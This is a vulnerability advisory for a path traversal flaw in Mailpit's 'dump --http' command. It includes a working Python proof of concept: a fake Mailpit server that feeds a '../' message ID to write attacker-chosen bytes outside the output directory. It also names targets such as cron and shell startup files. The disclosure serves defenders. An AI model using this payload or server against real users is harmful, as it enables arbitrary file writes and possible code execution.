PT-2026-41966 · Go · Github.Com/Axllent/Mailpit
Published
2026-05-19
·
Updated
2026-05-19
·
CVE-2026-45711
CVSS v3.1
5.9
Medium
| Vector | AV:N/AC:H/PR:N/UI:R/S:U/C:N/I:H/A:L |
Summary
The mailpit dump --http sub-command downloads every message from a remote Mailpit instance and writes each one as .eml inside the user-supplied output directory. The message ID field is taken verbatim from the JSON response of the remote server and concatenated into the output path with path.Join, which silently normalizes .. segments. A malicious HTTP server impersonating Mailpit can therefore make mailpit dump write attacker-controlled bytes to any path the running user can write, fully outside the intended output directory.
Details
Anyone who can convince a user to run mailpit dump --http
(typosquat, phishing tutorial, MITM of a plain-http:// Mailpit, or a compromised internal Mailpit they back up regularly) obtains an arbitrary file write primitive as the dumping user. Realistic post-exploitation includes overwriting init/cron files, shell startup files, CI artifact upload targets, web roots, etc. — anything the dumping user can write to, with attacker-controlled file bytes and a .eml filename suffix.
Affected code
path.Join("/safe/out/dir", "../../../../etc/cron.d/payload.eml") resolves to /etc/cron.d/payload.eml — the .. segments are normalized, not rejected. The remote server controls both m.ID (path) and the body of /api/v1/message//raw (contents). There is no filepath.Rel(outDir, out) containment check, no allow-list on m.ID characters, and no body-size cap.
The underlying cause is that the command was added to back up a trusted Mailpit, but the trust model on the wire never gets validated — the operator only supplies a URL.
PoC
- Run a malicious "Mailpit" server that returns one message whose ID contains .. segments:
# evil-mailpit.py
import http.server, json
class Evil(http.server.BaseHTTPRequestHandler):
def do GET(self):
if "/api/v1/messages" in self.path:
resp = {
"total": 1, "unread": 0, "count": 1,
"messages count": 1, "messages unread": 0,
"start": 0, "tags": [],
"messages": [{
"ID": "../../../../tmp/mailpit-pwn", # ← traversal
"MessageID": "x", "Read": False,
"From": {"Name": "", "Address": "a@b"},
"To": [{"Name": "", "Address": "c@d"}],
"Cc": None, "Bcc": None, "ReplyTo": [],
"Subject": "evil",
"Created": "2026-01-01T00:00:00Z",
"Tags": [], "Size": 5,
"Attachments": 0, "Snippet": ""
}]
}
body = json.dumps(resp).encode()
ctype = "application/json"
elif "/raw" in self.path:
body = b"PWNED BY MAILPIT DUMP TRAVERSAL
"
ctype = "text/plain"
else:
self.send response(404); self.end headers(); return
self.send response(200)
self.send header("Content-Type", ctype)
self.send header("Content-Length", str(len(body)))
self.end headers()
self.wfile.write(body)
http.server.HTTPServer(("127.0.0.1", 19090), Evil).serve forever()$ python3 evil-mailpit.py &
$ mkdir -p /tmp/dump-out
$ mailpit dump --http http://127.0.0.1:19090/ /tmp/dump-out- Observe the file was written outside the requested output directory:
$ ls -la /tmp/dump-out/ /tmp/mailpit-pwn.eml
/tmp/dump-out/ ← empty
total 0
-rw-r--r-- 1 user user 31 May 11 16:16 /tmp/mailpit-pwn.eml
$ cat /tmp/mailpit-pwn.eml
PWNED BY MAILPIT DUMP TRAVERSALThe same primitive trivially targets ~/.config/autostart/*.eml, ~/.bash logout.eml (where it overwrites if symlinked), CI artifact dirs that ingest every file, or via long ../ chains any absolute path the user can write to.
Impact
Arbitrary file write via path traversal in mailpit dump --http, allowing a malicious Mailpit-compatible server to force writes outside the intended output directory. This can lead to overwriting sensitive files (e.g. cron jobs, CI artifacts, shell configs) and potential code execution depending on write location and privileges.
Fix
Path traversal
Found an issue in the description? Have something to add? Feel free to write us 👾
Related Identifiers
Affected Products
Github.Com/Axllent/Mailpit